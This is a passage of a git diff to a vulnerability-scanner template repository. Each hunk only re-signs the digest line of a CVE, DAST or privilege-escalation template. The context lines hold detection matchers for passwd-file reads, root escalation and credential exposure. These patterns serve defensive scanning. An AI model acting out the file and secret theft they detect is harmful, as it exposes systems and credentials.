490a0046304402207c6a17c6dcfa5e1c0705af985ede699d418ae7488b1f1a1d29faf8b7dcc7e8920220008d95bc160ad21eb5224ab61a5f4ffc0c7ae1d1b6513f4add54a8e1624df386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index f0c37464f1..82ea2ae00b 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -40,4 +40,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0e1b0f8d02b42918c0845dc5e5d78fc1c8d9a16120a30c0607392239fd7acc1022000b3670974ad0b3ae3912068b5315a610b9a2e6028401acf310cc430a4d9facc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index e6601058e6..37c78d8cfb 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -55,4 +55,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f71ea7f284c92f61ede41dec7bf632da2b6f19950112c01dc700e8ad877d5e6e0221009569eafc6aacde58eeb2243f2af58f3e80fc23ae5631b894d03b5a17be1d7201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index cb5cb03a00..25c98ac3c4 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -90,4 +90,4 @@ http: - type: dsl dsl: - '"Username => "+ username' -# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd75893be6bdbdd291261de98eaaf9655419b306536c647069f97bc6b71ddbe2022029ba873b1e50b5a01e59c18aaa95b53a8217ef58ccec9e655b60d8dfc63259eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index 3a9fa8efa0..daf66317e9 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -39,4 +39,4 @@ code: - type: word words: - "139" # Segmentation Fault Exit Code -# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d08133fa6531aad4e00eb212908470e14839334ed5db3de00407ea2cee249660220021a38d5d167fb379028d9c9f8fecd46d3360fd546c566ad3767be0e9913cca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index e05515ac86..2543b9f1dd 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -39,4 +39,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a919cd26f6c36adc91930b301d7861d1049bb0bc1222498a4f3115bc53ff10a022100954ecf5dc41c3dad43fb10d639f353368aed51b849f59d1b23462b1a02ab86a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-3094.yaml b/code/cves/2024/CVE-2024-3094.yaml index 0ebb934f0c..42576af2c0 100644 --- a/code/cves/2024/CVE-2024-3094.yaml +++ b/code/cves/2024/CVE-2024-3094.yaml @@ -59,4 +59,4 @@ code: - type: dsl dsl: - response -# digest: 4b0a00483046022100ac6864410c93e586885b4473cebffd245bb5c0448e7ece0ab162f92f0ecfe4f302210092315c5373e9393c838e7b5e78d7dbc755ccaf673efdb536ec799630299352e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff27fd00a95152d34d7bfd96983b912ed0539184f94ee57f0fc4446451a0536402203929b77426326e3cb6baa2e5afcf3bdf3cf73bd93195f7ed2432dede184b3ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml index b4a78efc79..f98605822c 100644 --- a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml +++ b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022022a00ad1518880dc881748fd331a8f7a3c599927934d342c7221c5ecccd445c1022100cff484fd929a67261efcef2917d8976308c8062ca11652d78b36b40c195c08aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa56cf60985d9b7af0481de9704b276f7dfb4729c6247f40e41e195c36dbfe51022100a36990c84dd3cc92747016bf36d3c1eb1fddbec3e40c312393abde1d75d1489f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index ec7011c9d2..4525db436b 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -47,4 +47,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f31f8ec34e95d06649fe4f66b2a6d12228cfb9ee6419361b4fded4af16c0e40022100d8f11206e0687b2d6aaa0982697f3ec62313b744167209f819487b74b40df159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index 3d7b35a2cf..5506950ac8 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -60,4 +60,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200467421a3a87f908e224035a2fdc0fb73bd7d08eecf66f046a0d240588621b35022100b03c60899e681e43c7b4a94df8b13f392e82abc07c9dfc12f41ba3028d9b3038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index f39e250811..f84783f350 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -66,4 +66,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9bdde7ed78042f12c288dcd94dfa4c5ffbf89b2a02783733b4b129e589296aa02202d2ddef37d3aadf3ca90725eb0718fd6115f2528a2517b612e9f1c1c5598ee89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index 2b4178e80d..630e86649e 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -47,4 +47,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dae6b9cabb8758e509dbba100f4df5f2372bdcad798fb059c701f05913f90ef202202f043730c663c513439af2ea02f13a86704c53b728b584e3ffaf148070eb9d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml index cddf72581c..4b665a402f 100644 --- a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -37,4 +37,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220424a72be2b73d7cb1af746905a58c5e09a4f4a4a4b1426742a5cf4f958f0ba6a02200a7a101e4035dee4feaadf003a37eb1e4d8f3ecca542337e5dc9767075863334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml index a07398d49e..651d4abfc2 100644 --- a/dast/vulnerabilities/crlf/cookie-injection.yaml +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -35,4 +35,4 @@ http: part: header regex: - '(?m)(?i)(^set-cookie.*cookie_injection.*)' -# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e8261dd2cb7d91b396e9113182736c74c9d2bf320de2e64cb7f21012c6a8eff022014e9227dd17849eac076639e72ffe2e84da4bb5b4b01cffb95771968b4f0ad21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 2a15f6c2e7..0f8bdaef51 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -70,4 +70,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022000c5e1faa6655bbb3adcbba890473900bb1a7ea522bbee7684da04fcd58ad613022100c3dffcd18d8133aebdad962d7013490ca3e90c50a0cfdf684c5ac54ab0ad2e34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 85eb10c2d5..b9f18b7c02 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -119,4 +119,4 @@ http: part: body regex: - '(<system.webServer[\s\S]+<\/system.webServer>)' -# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f25e304b713186e620bc4448b9277a9874b77763bbf31e8b099b97bbcab85c702207be12ef346bdc11f03b226da7811a9f0fccbf6dc7e818020cdd707dade3c7508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml index 2ddfa0872c..7ba51807a2 100644 --- a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -79,4 +79,4 @@ http: part: body regex: - 'root:.*:0:0:' -# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c53383c7a148e9311173ee5bb2bf1177386db240eff9b2f6d8256e88cbf5f1a022100ddb39020f7957af58c62c6ec59c7094277c8193e4ab089cd4cce994da4d140d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml index 41eac97775..2c2fda8b7f 100644 --- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -72,4 +72,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6f8ee294173fc629f71ec9dfe9c61ad2fbec55dce015a895d126264c15db4f902204dd04d624e3dd7f4bc7cec991d5d87df7c33db24bf681c23b6f18564abfbf644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index cc28754ad8..736d0bd7c1 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -181,4 +181,4 @@ http: - 301 - 302 - 307 -# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml index 58f33dd8cf..3f2dbeeed6 100644 --- a/dast/vulnerabilities/rfi/generic-rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -32,4 +32,4 @@ http: part: body # Confirms the PHP was executed words: - "NessusCodeExecTest" -# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029d2873c4bd52bc2237f5807f6053de597738e331d83ff8661e78b54b9f8eabc02200aef90a617b1a1997f782d347cdea43e3cba3e453b60aa77148a0632bade8d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index 095b54444d..45a6066770 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -493,4 +493,4 @@ http: - "SQ200: No table " - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" -# digest: 4a0a00473045022100991ee3aa73500a4773ffbc23f50ab000999d53da3f5ab8723a4abc146eba69ee02207ef58106e21c140b29dfabac8270bbe11bd86b7b14f51b785f437e20d1f124de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100def6b6c4c85fe7786b61273d67b03bdcee001f0c68a862eaefdb3b9683291467022016d745831a21fa1c90b37bd0b0557828da77cf36662ddec1898ee436d5990a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 61435e1722..71389958fd 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -41,4 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221008e67c53d4368607db787a520c50ce1ae8c742483ea80c0e7d34ab8ef529d2c9902205c049079f166eae9a8e5c5c99b72a048bebaa05de3eb3828adb9d81fab3543aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index ee4474d3a4..1b6ab7b830 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -128,4 +128,4 @@ http: part: body regex: - 'id[\s\S]+interfaces\/' -# digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml index a5d82890a5..ac39f8bac8 100644 --- a/dast/vulnerabilities/ssti/reflection-ssti.yaml +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -52,4 +52,4 @@ http: part: body words: - "{{result}}" -# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d708d1c94470ed6b8905dc03b2e87fd5408f31412d9cb8e002a271e13eae29ed02204c3c34ba3a148255d64a9513e36fe35a57032a0c9c5ede1d1c4d14d7813cc6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index fb6c54ec24..edd271186f 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -40,4 +40,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 8098d4881c..ff5cbd8d9d 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -51,4 +51,4 @@ http: part: body words: - 'for 16-bit app support' -# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml index 9753003759..08ac78ddff 100644 --- a/dns/bimi-detect.yaml +++ b/dns/bimi-detect.yaml @@ -23,4 +23,4 @@ dns: - type: regex regex: - "v=BIMI1(.+)" -# digest: 4a0a004730450221008445fc238e87f9342ce983f65c136755a858f4b59106a74fe0a685b7cbc0d9d20220723212d91ee35908c09375b9eef99966b5c4e47ca3d5dab26b2013f76ff5891e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220605ed411689a170cf998da54d5e46492d87ddd699d4e863af5c74ab042d84f26022100d1dcec6514e480b66731a11ee26545bc301c8a6aa7c25d90e0ffce2da14dae54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml index 80174457dd..217f10b52f 100644 --- a/file/keys/credential-exposure-file.yaml +++ b/file/keys/credential-exposure-file.yaml @@ -3465,4 +3465,4 @@ file: - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" # Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100b72b69d337c25863bb7f860b4a6811ae2eefe0dd86e750fec9e74e84acbe9f61022035683b418d60d3eadb52eafc6261e03e9eb0e08e2c6f0f3d51bf38f43da64e66:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220045ec05e89307c40d97b871dedb06fc2e6c29e7f9472652f27a3af78cbb47c6a0221008aa1c6521a840b9f7dbf8e4c0f83863894011561e0d3d244858683684293f221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 4b97dda33f..e5d69c5394 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -73,4 +73,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b620185825b2c7dd85b7d2fb9e5863acfd2c2b606b86934fc08cbc8fc997be3022100d10e8cd09cbe237f829b10d1e0a5226cf9e34a7a2c007f3e53029cae7f920b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index 837728ef56..8b735dea8c 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -219,4 +219,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037d26b0bf4e1e46e77bcae5925a09f8dd5e8ea38894b06c3a450cac92ae803b5022016539aa792c7f25f571a45c194e983fa46aa24f8980c2829025ebf9e7c4e3b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220010b004e9a80e7bcef4de9826e973992a8ea72217ce2d6813700f1aceded13db0221008b37c8a048d1a96621dae497d9241f2ee0b8920f952cfa6d9f92a69715504fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index bbc76106c0..982503c4a8 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201473c48150a393eeb0801323af0b0e94147a66a15315b3c0cb476027ce5f6c880220684bd14e88b482a6ed2d4707b2bef6916911ba91ca0cb9fe97f6396c14476607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index f73a44bd57..a15454eb23 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d570edc7b33b2580048fec77b6b2f9f0d57f868585cae9342aab99effc8360cf022100ed0064a22046fe4db93c24d2342e3f3cab562c91cb7ef94b03b1ba4eefdc35bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006fbcd11636dfc6b0b78088e94cfe495bc28c0d9eaa663e0ef65303287ed924a022100cb422c04283414be90778be5b8712e505251da233859464e47659f678fb14826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index a34dfd2c7d..c3fdc5daa7 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dcd27cbb0d1546b2d94f702f5298cdf445b5fcea29d9741ab30cdedd59749c2f022009e09962e874a528aea693b7c0c3984cf75ac175451d01bf66ae6a6d6d9f7e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030dfd1dffb93aef87571c322ecdfc9aeef785a992efb1fbe3b847f1a23a4808602207ddca1c1fdfb4241fe6d05f8d1a531931450f32a8663883bd70541df6a93575f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index a16058ffa9..01e8e8440b 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079f74e17066a8030a2ff5a3ea6fa4258ba6ec59353823c400a4f933c88b091020220765e9a7f5973726aebe82162e0dc3565fd9f7f6fa15e4f417d5bdd2c0696de1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc1ea6067e1a2f98cb58afb4fa1daf840e7eafc846b13bc838acc791c330201f022100ab6f25fab6b17ce9e8d5f114cf69a9403e49b9c67bbfe3d0027076173e390c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 409d18f673..7ac1ee56ff 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220023561509073a250a9589a0ef1039640f1a8e364c5893b9ebbfa32fab389dbef022051dbb9e24a672b7ca924059689d605544097318aa9d433aafdd646a6d4887282:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018445e34aa198d712b4c0d606f9c17f6dffee851b93d92af3ff4fae54f1219fc022000c602869ddf4f145703d0640aeb529459c69b8db67ba7cc27b27fa741d8e37d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 293da33ddf..274c4e23a9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -45,4 